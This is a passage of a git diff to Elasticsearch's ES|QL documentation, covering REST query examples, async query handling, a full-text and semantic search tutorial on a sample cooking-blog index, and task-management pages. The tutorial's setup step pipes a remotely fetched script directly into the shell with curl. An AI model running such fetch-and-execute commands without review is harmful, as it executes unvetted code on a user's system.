+ +```console +POST /_query?format=txt +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """, + "filter": { + "range": { + "page_count": { + "gte": 100, + "lte": 200 + } + } + } +} +``` + +Which returns: + +```text + author | name | page_count | release_date +---------------+------------------------------------+---------------+------------------------ +Douglas Adams |The Hitchhiker's Guide to the Galaxy|180 |1979-10-12T00:00:00.000Z +``` + + +### Columnar results [esql-rest-columnar] + +By default, {{esql}} returns results as rows. For example, `FROM` returns each individual document as one row. For the `json`, `yaml`, `cbor`, and `smile` [formats](#esql-rest-format), {{esql}} can return the results in a columnar fashion where one row represents all the values of a certain column in the results. + +```console +POST /_query?format=json +{ + "query": """ + FROM library + | KEEP author, name, page_count, release_date + | SORT page_count DESC + | LIMIT 5 + """, + "columnar": true +} +``` + +Which returns: + +```console-result +{ + "took": 28, + "is_partial": false, + "columns": [ + {"name": "author", "type": "text"}, + {"name": "name", "type": "text"}, + {"name": "page_count", "type": "integer"}, + {"name": "release_date", "type": "date"} + ], + "values": [ + ["Peter F. Hamilton", "Vernor Vinge", "Frank Herbert", "Alastair Reynolds", "James S.A. Corey"], + ["Pandora's Star", "A Fire Upon the Deep", "Dune", "Revelation Space", "Leviathan Wakes"], + [768, 613, 604, 585, 561], + ["2004-03-02T00:00:00.000Z", "1992-06-01T00:00:00.000Z", "1965-06-01T00:00:00.000Z", "2000-03-15T00:00:00.000Z", "2011-06-02T00:00:00.000Z"] + ] +} +``` + + +### Returning localized results [esql-locale-param] + +Use the `locale` parameter in the request body to return results (especially dates) formatted per the conventions of the locale. If `locale` is not specified, it defaults to `en-US` (English). Refer to [JDK Supported Locales](https://www.oracle.com/java/technologies/javase/jdk17-suported-locales.html). + +Syntax: the `locale` parameter accepts language tags in the (case-insensitive) format `xy` and `xy-XY`. + +For example, to return a month name in French: + +```console +POST /_query +{ + "locale": "fr-FR", + "query": """ + ROW birth_date_string = "2023-01-15T00:00:00.000Z" + | EVAL birth_date = date_parse(birth_date_string) + | EVAL month_of_birth = DATE_FORMAT("MMMM",birth_date) + | LIMIT 5 + """ +} +``` + + +### Passing parameters to a query [esql-rest-params] + +Values, such as those used in a condition, can be passed to a query "inline" by embedding them in the query string itself: + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > 300 AND author == "Frank Herbert" + | STATS count = COUNT(*) by year + | WHERE count > 0 + | LIMIT 5 + """ +} +``` + +To guard against hacking attempts or code injection, extract the values into a separate list of parameters. Use question mark placeholders (`?`) in the query string for each of the parameters: + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ? AND author == ? + | STATS count = COUNT(*) by year + | WHERE count > ? + | LIMIT 5 + """, + "params": [300, "Frank Herbert", 0] +} +``` + +The parameters can be named parameters or positional parameters. + +Named parameters use question mark placeholders (`?`) followed by a string.
+ +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ?page_count AND author == ?author + | STATS count = COUNT(*) by year + | WHERE count > ?count + | LIMIT 5 + """, + "params": [{"page_count" : 300}, {"author" : "Frank Herbert"}, {"count" : 0}] +} +``` + +Positional parameters use question mark placeholders (`?`) followed by an integer. + +```console +POST /_query +{ + "query": """ + FROM library + | EVAL year = DATE_EXTRACT("year", release_date) + | WHERE page_count > ?1 AND author == ?2 + | STATS count = COUNT(*) by year + | WHERE count > ?3 + | LIMIT 5 + """, + "params": [300, "Frank Herbert", 0] +} +``` + + +### Running an async {{esql}} query [esql-rest-async-query] + +The [{{esql}} async query API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query) lets you asynchronously execute a query request, monitor its progress, and retrieve results when they become available. + +Executing an {{esql}} query is commonly quite fast; however, queries across large data sets or frozen data can take some time. To avoid long waits, run an async {{esql}} query. + +Queries initiated by the async query API may or may not return results in the initial response. The `wait_for_completion_timeout` property determines how long to wait for the results. If the results are not available by this time, a [query id](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query#esql-async-query-api-response-body-query-id) is returned, which can later be used to retrieve the results. For example: + +```console +POST /_query/async +{ + "query": """ + FROM library + | EVAL year = DATE_TRUNC(1 YEARS, release_date) + | STATS MAX(page_count) BY year + | SORT year + | LIMIT 5 + """, + "wait_for_completion_timeout": "2s" +} +``` + +If the results are not available within the given timeout period (2 seconds in this case), no results are returned. Instead, the response includes: + +* A query ID +* An `is_running` value of *true*, indicating the query is ongoing + +The query continues to run in the background without blocking other requests. + +```console-result +{ + "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", + "is_running": true +} +``` + +To check the progress of an async query, use the [{{esql}} async query get API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get) with the query ID. Specify how long you’d like to wait for complete results in the `wait_for_completion_timeout` parameter. + +```console +GET /_query/async/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?wait_for_completion_timeout=30s +``` + +If the response’s `is_running` value is `false`, the query has finished and the results are returned, along with the `took` time for the query. + +```console-result +{ + "is_running": false, + "took": 48, + "columns": ... +} +``` + +To stop a running async query and return the results computed so far, use the [async stop API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-stop) with the query ID. + +```console +POST /_query/async/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/stop +``` +The query will be stopped and the response will contain the results computed so far. The response format is the same as the `get` API. + +```console-result +{ + "is_running": false, + "took": 48, + "is_partial": true, + "columns": ...
+} +``` +This API can be used to retrieve results even if the query has already completed, as long as it's within the `keep_alive` window. +The `is_partial` field indicates result completeness. A value of `true` means the results are potentially incomplete. + +Use the [{{esql}} async query delete API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete) to delete an async query before the `keep_alive` period ends. If the query is still running, {{es}} cancels it. + +```console +DELETE /_query/async/FmdMX2pIang3UWhLRU5QS0lqdlppYncaMUpYQ05oSkpTc3kwZ21EdC1tbFJXQToxOTI= +``` + +::::{note} +You will also receive the async ID and running status in the `X-Elasticsearch-Async-Id` and `X-Elasticsearch-Async-Is-Running` HTTP headers of the response, respectively. +This is useful if you use a tabular text format like `txt`, `csv`, or `tsv`, as you won't receive those fields in the response body. +:::: diff --git a/docs/reference/query-languages/esql/esql-search-tutorial.md b/docs/reference/query-languages/esql/esql-search-tutorial.md new file mode 100644 index 0000000000000..61c1c7b871199 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-search-tutorial.md @@ -0,0 +1,475 @@ +--- +applies_to: + stack: preview 9.0, ga 9.1 + serverless: ga +navigation_title: Search and filter with ES|QL +--- + +# Search and filter with {{esql}} + +This is a hands-on introduction to the basics of full-text search and semantic search, using {{esql}}. + +In this scenario, we're implementing search for a cooking blog. The blog contains recipes with various attributes including textual content, categorical data, and numerical ratings. + +## Requirements + +You need a running {{es}} cluster, together with {{kib}}, to use the Dev Tools API Console. Refer to [choose your deployment type](docs-content://deploy-manage/deploy.md#choosing-your-deployment-type) for deployment options. + +Want to get started quickly? Run the following command in your terminal to set up a [single-node local cluster in Docker](docs-content://deploy-manage/deploy/self-managed/local-development-installation-quickstart.md): + +```sh +curl -fsSL https://elastic.co/start-local | sh +``` + +## Running {{esql}} queries + +In this tutorial, {{esql}} examples are displayed in the following format: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| LIMIT 1000 +``` + +If you want to run these queries in the [Dev Tools Console](/reference/query-languages/esql/esql-rest.md#esql-kibana-console), you need to use the following syntax: + +```console +POST /_query?format=txt +{ + "query": """ + FROM cooking_blog + | WHERE description:"fluffy pancakes" + | LIMIT 1000 + """ +} +``` + +If you'd prefer to use your favorite programming language, refer to [Client libraries](docs-content://solutions/search/site-or-app/clients.md) for a list of official and community-supported clients.
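+If you're working outside Console, a minimal `curl` sketch for the same request looks like this (assuming a cluster reachable at `localhost:9200`; add authentication flags as required by your deployment): + +```sh +curl -X POST "http://localhost:9200/_query?format=txt" \ +  -H "Content-Type: application/json" \ +  -d '{"query": "FROM cooking_blog | WHERE description:\"fluffy pancakes\" | LIMIT 1000"}' +```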
+ +## Step 1: Create an index + +Create the `cooking_blog` index to get started: + +```console +PUT /cooking_blog +``` + +Now define the mappings for the index: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "title": { + "type": "text", + "analyzer": "standard", <1> + "fields": { <2> + "keyword": { + "type": "keyword", + "ignore_above": 256 <3> + } + } + }, + "description": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "author": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "date": { + "type": "date", + "format": "yyyy-MM-dd" + }, + "category": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "tags": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "rating": { + "type": "float" + } + } +} +``` + +1. `analyzer`: Used for text analysis. If you don't specify it, the `standard` analyzer is used by default for `text` fields. It’s included here for demonstration purposes. To learn more about analyzers, refer to [Anatomy of an analyzer](docs-content://manage-data/data-store/text-analysis/anatomy-of-an-analyzer.md). +2. `fields`: Declares the field with both `text` and `keyword` [data types](/reference/elasticsearch/mapping-reference/field-data-types.md). Such fields are called [Multi-fields](/reference/elasticsearch/mapping-reference/multi-fields.md). This enables both full-text search and exact matching/filtering on the same field. If you use [dynamic mapping](docs-content://manage-data/data-store/mapping/dynamic-field-mapping.md), these multi-fields will be created automatically. Other fields in the mapping like `description`, `author`, `category`, and `tags` are also declared as multi-fields. +3. `ignore_above`: Prevents indexing values longer than 256 characters in the `keyword` field. This is the default value and it’s included here for demonstration purposes. It helps to save disk space and avoid potential issues with Lucene’s term byte-length limit. For more information, refer to the [ignore_above parameter](/reference/elasticsearch/mapping-reference/ignore-above.md). + +::::{tip} +Full-text search is powered by [text analysis](docs-content://solutions/search/full-text/text-analysis-during-search.md). Text analysis normalizes and standardizes text data so it can be efficiently stored in an inverted index and searched in near real-time. Analysis happens at both [index and search time](docs-content://manage-data/data-store/text-analysis/index-search-analysis.md). This tutorial won't cover analysis in detail, but it's important to understand how text is processed to create effective search queries. +:::: + +## Step 2: Add sample blog posts to your index [full-text-filter-tutorial-index-data] + +Next, you’ll need to index some example blog posts using the [Bulk API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk). Note that `text` fields are analyzed and multi-fields are generated at index time. + +```console +POST /cooking_blog/_bulk?refresh=wait_for +{"index":{"_id":"1"}} +{"title":"Perfect Pancakes: A Fluffy Breakfast Delight","description":"Learn the secrets to making the fluffiest pancakes, so amazing you won't believe your tastebuds.
This recipe uses buttermilk and a special folding technique to create light, airy pancakes that are perfect for lazy Sunday mornings.","author":"Maria Rodriguez","date":"2023-05-01","category":"Breakfast","tags":["pancakes","breakfast","easy recipes"],"rating":4.8} +{"index":{"_id":"2"}} +{"title":"Spicy Thai Green Curry: A Vegetarian Adventure","description":"Dive into the flavors of Thailand with this vibrant green curry. Packed with vegetables and aromatic herbs, this dish is both healthy and satisfying. Don't worry about the heat - you can easily adjust the spice level to your liking.","author":"Liam Chen","date":"2023-05-05","category":"Main Course","tags":["thai","vegetarian","curry","spicy"],"rating":4.6} +{"index":{"_id":"3"}} +{"title":"Classic Beef Stroganoff: A Creamy Comfort Food","description":"Indulge in this rich and creamy beef stroganoff. Tender strips of beef in a savory mushroom sauce, served over a bed of egg noodles. It's the ultimate comfort food for chilly evenings.","author":"Emma Watson","date":"2023-05-10","category":"Main Course","tags":["beef","pasta","comfort food"],"rating":4.7} +{"index":{"_id":"4"}} +{"title":"Vegan Chocolate Avocado Mousse","description":"Discover the magic of avocado in this rich, vegan chocolate mousse. Creamy, indulgent, and secretly healthy, it's the perfect guilt-free dessert for chocolate lovers.","author":"Alex Green","date":"2023-05-15","category":"Dessert","tags":["vegan","chocolate","avocado","healthy dessert"],"rating":4.5} +{"index":{"_id":"5"}} +{"title":"Crispy Oven-Fried Chicken","description":"Get that perfect crunch without the deep fryer! This oven-fried chicken recipe delivers crispy, juicy results every time. A healthier take on the classic comfort food.","author":"Maria Rodriguez","date":"2023-05-20","category":"Main Course","tags":["chicken","oven-fried","healthy"],"rating":4.9} +``` + +## Step 3: Basic search operations + +Full-text search involves executing text-based queries across one or more document fields. In this section, you'll start with simple text matching and build up to understanding how search results are ranked. + +{{esql}} provides multiple functions for full-text search, including `MATCH`, `MATCH_PHRASE`, and `QSTR`. For basic text matching, you can use either: + +1. Full [match function](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match) syntax: `match(field, "search terms")` +2. Compact syntax using the [match operator `:`](/reference/query-languages/esql/functions-operators/operators.md#esql-match-operator): `field:"search terms"` + +Both are equivalent for basic matching and can be used interchangeably. The compact syntax is more concise, while the function syntax allows for more configuration options. We use the compact syntax in most examples for brevity. + +Refer to the [`MATCH` function](/reference/query-languages/esql/functions-operators/search-functions.md#esql-match) reference docs for advanced parameters available with the function syntax. + +### Perform your first search query + +Let's start with the simplest possible search - looking for documents that contain specific words: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| LIMIT 1000 +``` + +This query searches the `description` field for documents containing either "fluffy" OR "pancakes" (or both). By default, {{esql}} uses OR logic between search terms, so it matches documents that contain any of the specified words. 
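+The multi-term match above is broadly equivalent to spelling out each term as its own condition. The following sketch makes the default OR logic explicit (shown for illustration only; the single multi-term match is the idiomatic form, and relevance scores can differ slightly): + +```esql +FROM cooking_blog +| WHERE description:"fluffy" OR description:"pancakes" +| LIMIT 1000 +```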
+ +### Control which fields appear in results + +You can specify the exact fields to include in your results using the `KEEP` command: + +```esql +FROM cooking_blog +| WHERE description:"fluffy pancakes" +| KEEP title, description, rating +| LIMIT 1000 +``` + +This helps reduce the amount of data returned and focuses on the information you need. + +### Understand relevance scoring + +Search results can be ranked based on how well they match your query. To calculate and use relevance scores, you need to explicitly request the `_score` metadata: + +```esql +FROM cooking_blog METADATA _score +| WHERE description:"fluffy pancakes" +| KEEP title, description, _score +| SORT _score DESC +| LIMIT 1000 +``` + +Notice two important things: +1. `METADATA _score` tells {{esql}} to include relevance scores in the results +2. `SORT _score DESC` orders results by relevance (highest scores first) + +If you don't include `METADATA _score` in your query, you won't see relevance scores in your results. This means you won't be able to sort by relevance or filter based on relevance scores. + +Without explicit sorting, results aren't ordered by relevance even when scores are calculated. If you want the most relevant results first, you must explicitly sort by `_score` using `SORT _score DESC` (`SORT _score ASC` returns the least relevant results first). + +:::{tip} +When you include `METADATA _score`, search functions included in `WHERE` conditions contribute to the relevance score. Filtering operations (like range conditions and exact matches) don't affect the score. +::: + +### Find exact matches + +Sometimes you need exact matches rather than full-text search. Use the `.keyword` field for case-sensitive exact matching: + +```esql +FROM cooking_blog +| WHERE category.keyword == "Breakfast" // Exact match (case-sensitive) +| KEEP title, category, rating +| SORT rating DESC +| LIMIT 1000 +``` + +This is fundamentally different from full-text search - it's a binary yes/no filter that doesn't affect relevance scoring. + +## Step 4: Search precision control + +Now that you understand basic searching, explore how to control the precision of your text matches. + +### Require all search terms (AND logic) + +By default, searches with match use OR logic between terms. To require ALL terms to match, use the function syntax with the `operator` parameter to specify AND logic: + +```esql +FROM cooking_blog +| WHERE match(description, "fluffy pancakes", {"operator": "AND"}) +| LIMIT 1000 +``` + +This stricter search returns *zero hits* on our sample data, as no document contains both "fluffy" and "pancakes" in the description. + +:::{note} +The `MATCH` function with AND logic doesn't require terms to be adjacent or in order. It only requires that all terms appear somewhere in the field. Use `MATCH_PHRASE` to [search for exact phrases](#search-for-exact-phrases). +::: + +### Set a minimum number of terms to match + +Sometimes requiring all terms is too strict, but the default OR behavior is too lenient. You can specify a minimum number of terms that must match: + +```esql +FROM cooking_blog +| WHERE match(title, "fluffy pancakes breakfast", {"minimum_should_match": 2}) +| LIMIT 1000 +``` + +This query searches the title field, requiring at least 2 of the 3 terms to match: "fluffy", "pancakes", or "breakfast".
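+To see how these partial matches rank, you can combine `minimum_should_match` with relevance scoring. Here is a sketch reusing the same sample data: + +```esql +FROM cooking_blog METADATA _score +| WHERE match(title, "fluffy pancakes breakfast", {"minimum_should_match": 2}) +| KEEP title, _score +| SORT _score DESC +| LIMIT 1000 +```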
+ +### Search for exact phrases + +When you need to find documents containing an exact sequence of words, use the `MATCH_PHRASE` function: + +```esql +FROM cooking_blog +| WHERE MATCH_PHRASE(description, "rich and creamy") +| KEEP title, description +| LIMIT 1000 +``` + +This query only matches documents where the words "rich and creamy" appear exactly in that order in the description field. + +## Step 5: Semantic search and hybrid search + +### Index semantic content + +{{es}} allows you to semantically search for documents based on the meaning of the text, rather than just the presence of specific keywords. This is useful when you want to find documents that are conceptually similar to a given query, even if they don't contain the exact search terms. + +ES|QL supports semantic search when your mappings include fields of the [`semantic_text`](/reference/elasticsearch/mapping-reference/semantic-text.md) type. This example mapping update adds a new field called `semantic_description` with the type `semantic_text`: + +```console +PUT /cooking_blog/_mapping +{ + "properties": { + "semantic_description": { + "type": "semantic_text" + } + } +} +``` + +Next, index a document with content into the new field: + +```console +POST /cooking_blog/_doc +{ + "title": "Mediterranean Quinoa Bowl", + "semantic_description": "A protein-rich bowl with quinoa, chickpeas, fresh vegetables, and herbs. This nutritious Mediterranean-inspired dish is easy to prepare and perfect for a quick, healthy dinner.", + "author": "Jamie Oliver", + "date": "2023-06-01", + "category": "Main Course", + "tags": ["vegetarian", "healthy", "mediterranean", "quinoa"], + "rating": 4.7 +} +``` + +### Perform semantic search + +Once the document has been processed by the underlying model running on the inference endpoint, you can perform semantic searches. Here's an example natural language query against the `semantic_description` field: + +```esql +FROM cooking_blog +| WHERE semantic_description:"What are some easy to prepare but nutritious plant-based meals?" +| LIMIT 5 +``` + +:::{tip} +If you'd like to test out the semantic search workflow against a large dataset, follow the [semantic-search-tutorial](docs-content://solutions/search/semantic-search/semantic-search-semantic-text.md). +::: + +### Perform hybrid search + +You can combine full-text and semantic queries. In this example we combine full-text and semantic search with custom weights: + +```esql +FROM cooking_blog METADATA _score +| WHERE match(semantic_description, "easy to prepare vegetarian meals", { "boost": 0.75 }) + OR match(tags, "vegetarian", { "boost": 0.25 }) +| SORT _score DESC +| LIMIT 5 +``` + +This query searches the `semantic_description` field for documents that are semantically similar to "easy to prepare vegetarian meals" with a higher weight, while also matching the `tags` field for "vegetarian" with a lower weight. The results are sorted by relevance score. + +Learn how to combine these with complex criteria in [Step 8](#step-8-complex-search-solutions). + +## Step 6: Advanced search features + +Once you're comfortable with basic search precision, use the following advanced features for powerful search capabilities. + +### Use query string for complex patterns + +The `QSTR` function enables powerful search patterns using a compact query language. 
It's ideal when you need wildcards, fuzzy matching, and boolean logic in a single expression: + +```esql +FROM cooking_blog +| WHERE QSTR(description, "fluffy AND pancak* OR (creamy -vegan)") +| KEEP title, description +| LIMIT 1000 +``` + +Query string syntax lets you: +- Use boolean operators: `AND`, `OR`, `-` (NOT) +- Apply wildcards: `pancak*` matches "pancake" and "pancakes" +- Enable fuzzy matching: `pancake~1` for typo tolerance +- Group terms: `(thai AND curry) OR pasta` +- Search exact phrases: `"fluffy pancakes"` +- Search across fields: `QSTR("title,description", "pancake OR (creamy AND rich)")` + +### Search across multiple fields + +When users enter a search query, they often don't know (or care) whether their search terms appear in a specific field. You can search across multiple fields simultaneously: + +```esql +FROM cooking_blog +| WHERE title:"vegetarian curry" OR description:"vegetarian curry" OR tags:"vegetarian curry" +| LIMIT 1000 +``` + +This query searches for "vegetarian curry" across the title, description, and tags fields. Each field is treated with equal importance. + +### Weight different fields + +In many cases, matches in certain fields (like the title) might be more relevant than others. You can adjust the importance of each field using boost scoring: + +```esql +FROM cooking_blog METADATA _score +| WHERE match(title, "vegetarian curry", {"boost": 2.0}) // Title matches are twice as important + OR match(description, "vegetarian curry") + OR match(tags, "vegetarian curry") +| KEEP title, description, tags, _score +| SORT _score DESC +| LIMIT 1000 +``` + +## Step 7: Filtering and exact matching + +Filtering allows you to narrow down your search results based on exact criteria. Unlike full-text searches, filters are binary (yes/no) and do not affect the relevance score. Filters execute faster than queries because excluded results don't need to be scored. + +### Basic filtering by category + +```esql +FROM cooking_blog +| WHERE category.keyword == "Breakfast" // Exact match using keyword field +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +### Date range filtering + +Often users want to find content published within a specific time frame: + +```esql +FROM cooking_blog +| WHERE date >= "2023-05-01" AND date <= "2023-05-31" // Inclusive date range filter +| KEEP title, author, date, rating +| LIMIT 1000 +``` + +### Numerical range filtering + +Filter by ratings or other numerical values: + +```esql +FROM cooking_blog +| WHERE rating >= 4.5 // Only highly-rated recipes +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +### Exact author matching + +Find recipes by a specific author: + +```esql +FROM cooking_blog +| WHERE author.keyword == "Maria Rodriguez" // Exact match on author +| KEEP title, author, rating, tags +| SORT rating DESC +| LIMIT 1000 +``` + +## Step 8: Complex search solutions + +Real-world search often requires combining multiple types of criteria. This section shows how to build sophisticated search experiences.
+ +### Combine filters with full-text search + +Mix filters, full-text search, and custom scoring in a single query: + +```esql +FROM cooking_blog METADATA _score +| WHERE rating >= 4.5 // Numerical filter + AND NOT category.keyword == "Dessert" // Exclusion filter + AND (title:"curry spicy" OR description:"curry spicy") // Full-text search in multiple fields +| SORT _score DESC +| KEEP title, author, rating, tags, description +| LIMIT 1000 +``` + +### Advanced relevance scoring + +For complex relevance scoring with combined criteria, you can use the `EVAL` command to calculate custom scores: + +```esql +FROM cooking_blog METADATA _score +| WHERE NOT category.keyword == "Dessert" +| EVAL tags_concat = MV_CONCAT(tags.keyword, ",") // Convert multi-value field to string +| WHERE tags_concat LIKE "*vegetarian*" AND rating >= 4.5 // Wildcard pattern matching +| WHERE match(title, "curry spicy", {"boost": 2.0}) OR match(description, "curry spicy") +| EVAL category_boost = CASE(category.keyword == "Main Course", 1.0, 0.0) // Conditional boost +| EVAL date_boost = CASE(DATE_DIFF("month", date, NOW()) <= 1, 0.5, 0.0) // Boost recent content +| EVAL custom_score = _score + category_boost + date_boost // Combine scores +| WHERE custom_score > 0 // Filter based on custom score +| SORT custom_score DESC +| LIMIT 1000 +``` + +## Learn more + +### Documentation + +This tutorial introduced the basics of search and filtering in {{esql}}. Building a real-world search experience requires understanding many more advanced concepts and techniques. Here are some resources once you're ready to dive deeper: + +- [Search with {{esql}}](docs-content://solutions/search/esql-for-search.md): Learn about all the search capabilities in {{esql}}. +- [{{esql}} search functions](/reference/query-languages/esql/functions-operators/search-functions.md): Explore the full list of search functions available in {{esql}}. +- [Semantic search](docs-content://solutions/search/semantic-search.md): Understand your various options for semantic search in Elasticsearch. + - [The `semantic_text` workflow](docs-content://solutions/search/semantic-search.md#_semantic_text_workflow): Learn how to use the `semantic_text` field type for semantic search. This is the recommended approach for most users looking to perform semantic search in {{es}}, because it abstracts away the complexity of setting up inference endpoints and models.
+ +### Related blog posts + +- [{{esql}}, you know for Search](https://www.elastic.co/search-labs/blog/esql-introducing-scoring-semantic-search): Introducing scoring and semantic search +- [Introducing full text filtering in {{esql}}](https://www.elastic.co/search-labs/blog/filtering-in-esql-full-text-search-match-qstr): Overview of {{esql}}'s text filtering capabilities diff --git a/docs/reference/query-languages/esql/esql-syntax.md b/docs/reference/query-languages/esql/esql-syntax.md index 248c85ddd95d6..ea941563e0728 100644 --- a/docs/reference/query-languages/esql/esql-syntax.md +++ b/docs/reference/query-languages/esql/esql-syntax.md @@ -159,7 +159,7 @@ FROM library } ``` -You can also use [query parameters](docs-content://explore-analyze/query-filter/languages/esql-rest.md#esql-rest-params) in function named parameters: +You can also use [query parameters](/reference/query-languages/esql/esql-rest.md#esql-rest-params) in function named parameters: ```console POST /_query diff --git a/docs/reference/query-languages/esql/esql-task-management.md b/docs/reference/query-languages/esql/esql-task-management.md new file mode 100644 index 0000000000000..a7351591719e3 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-task-management.md @@ -0,0 +1,57 @@ +--- +navigation_title: List running queries +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-task-management.html +applies_to: + stack: ga + serverless: ga +products: + - id: elasticsearch +--- + + + +# Find long-running {{esql}} queries [esql-task-management] + + +You can list running {{esql}} queries with the [task management APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks): + +$$$esql-task-management-get-all$$$ + +```console +GET /_tasks?pretty&detailed&group_by=parents&human&actions=*data/read/esql +``` + +Which returns a list of statuses like this: + +```js +{ + "node" : "2j8UKw1bRO283PMwDugNNg", + "id" : 5326, + "type" : "transport", + "action" : "indices:data/read/esql", + "description" : "FROM test | STATS MAX(d) by a, b", <1> + "start_time" : "2023-07-31T15:46:32.328Z", + "start_time_in_millis" : 1690818392328, + "running_time" : "41.7ms", <2> + "running_time_in_nanos" : 41770830, + "cancellable" : true, + "cancelled" : false, + "headers" : { } +} +``` + +1. The user-submitted query. +2. Time the query has been running. + + +You can use this to find long-running queries and, if you need to, cancel them with the [task cancellation API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-tasks#task-cancellation): + +$$$esql-task-management-cancelEsqlQueryRequestTests$$$ + +```console +POST _tasks/2j8UKw1bRO283PMwDugNNg:5326/_cancel +``` + +It may take a few seconds for the query to be stopped. + diff --git a/docs/reference/query-languages/esql/esql-troubleshooting.md b/docs/reference/query-languages/esql/esql-troubleshooting.md new file mode 100644 index 0000000000000..696de0d42f5b2 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-troubleshooting.md @@ -0,0 +1,10 @@ +--- +navigation_title: "Troubleshooting" +--- + +# Troubleshooting {{esql}} [esql-troubleshooting] + +This section provides some useful resources for troubleshooting {{esql}} issues: + +- [Query log](esql-query-log.md): Learn how to log {{esql}} queries. +- [Task management API](esql-task-management.md): Learn how to diagnose issues like long-running queries.
diff --git a/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md b/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md index d954260eb8f44..04858c66a0390 100644 --- a/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/aggregation-functions.md @@ -7,7 +7,7 @@ mapped_pages: # {{esql}} aggregation functions [esql-aggregation-functions] -The [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command supports these aggregate functions: +The [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command supports these aggregate functions: :::{include} ../_snippets/lists/aggregation-functions.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/grouping-functions.md b/docs/reference/query-languages/esql/functions-operators/grouping-functions.md index dab4fc1cc46e2..7cd02febec968 100644 --- a/docs/reference/query-languages/esql/functions-operators/grouping-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/grouping-functions.md @@ -7,7 +7,7 @@ mapped_pages: # {{esql}} grouping functions [esql-group-functions] -The [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command supports these grouping functions: +The [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command supports these grouping functions: :::{include} ../_snippets/lists/grouping-functions.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/math-functions.md b/docs/reference/query-languages/esql/functions-operators/math-functions.md index 2a4cb855717d7..99c7c7394191a 100644 --- a/docs/reference/query-languages/esql/functions-operators/math-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/math-functions.md @@ -33,6 +33,9 @@ mapped_pages: :::{include} ../_snippets/functions/layout/ceil.md ::: +:::{include} ../_snippets/functions/layout/copy_sign.md +::: + :::{include} ../_snippets/functions/layout/cos.md ::: diff --git a/docs/reference/query-languages/esql/functions-operators/search-functions.md b/docs/reference/query-languages/esql/functions-operators/search-functions.md index bf31cce7df3ca..597f61cfc5003 100644 --- a/docs/reference/query-languages/esql/functions-operators/search-functions.md +++ b/docs/reference/query-languages/esql/functions-operators/search-functions.md @@ -8,7 +8,7 @@ mapped_pages: :::{tip} Get started with {{esql}} for search use cases with -our [hands-on tutorial](docs-content://solutions/search/esql-search-tutorial.md). +our [hands-on tutorial](/reference/query-languages/esql/esql-search-tutorial.md). For a high-level overview of search functionalities in {{esql}}, and to learn about relevance scoring, refer to [{{esql}} for search](docs-content://solutions/search/esql-for-search.md#esql-for-search-scoring). 
::: diff --git a/docs/reference/query-languages/esql/images/functions/copy_sign.svg b/docs/reference/query-languages/esql/images/functions/copy_sign.svg new file mode 100644 index 0000000000000..82455b59b1eda --- /dev/null +++ b/docs/reference/query-languages/esql/images/functions/copy_sign.svg @@ -0,0 +1 @@ +COPY_SIGN(magnitude,sign) \ No newline at end of file diff --git a/docs/reference/query-languages/esql/images/operators/predicates.svg b/docs/reference/query-languages/esql/images/operators/predicates.svg deleted file mode 100644 index 2740ff8dc31e6..0000000000000 --- a/docs/reference/query-languages/esql/images/operators/predicates.svg +++ /dev/null @@ -1 +0,0 @@ -IS NULL and IS NOT NULLv \ No newline at end of file diff --git a/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json b/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json new file mode 100644 index 0000000000000..51d3edca937f8 --- /dev/null +++ b/docs/reference/query-languages/esql/kibana/definition/functions/copy_sign.json @@ -0,0 +1,172 @@ +{ + "comment" : "This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.", + "type" : "scalar", + "name" : "copy_sign", + "description" : "Returns a value with the magnitude of the first argument and the sign of the second argument.\nThis function is similar to Java's Math.copySign(double magnitude, double 